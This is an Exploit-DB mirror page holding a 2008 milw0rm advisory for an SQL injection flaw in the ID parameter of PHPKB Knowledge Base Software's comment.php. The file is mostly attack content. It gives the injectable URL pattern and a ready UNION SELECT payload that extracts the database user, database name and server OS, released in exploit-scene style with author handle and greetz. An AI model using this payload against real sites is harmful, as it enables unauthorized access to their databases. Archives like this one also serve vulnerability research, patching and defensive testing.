bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/5428.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

18 lines
920 B
Text
Executable file
Raw Blame History

PHPKB Knowledge Base Software (comment.php) Sql Injection Vulnerability
-------------------------------------------------------------------------------------------------
# Author : parad0x
# Home : www.inso.host.sk
# Script : PHPKB Knowledge Base Software
# Script Homepage : http://www.knowledgebase-script.com
-------------------------------------------------------------------------------------------------
http://[target]/comment.php?ID=[SQL]
-------------------------------------------------------------------------------------------------
Example:
http://www.xxx.org/comment.php?ID=-67+union+select+concat(user(),char(32),database(),char(32),@@version_compile_os)/*
-------------------------------------------------------------------------------------------------
greetz : VoLqaN
-------------------------------------------------------------------------------------------------
# milw0rm.com [2008-04-11]
Reference in a new issue View git blame Copy permalink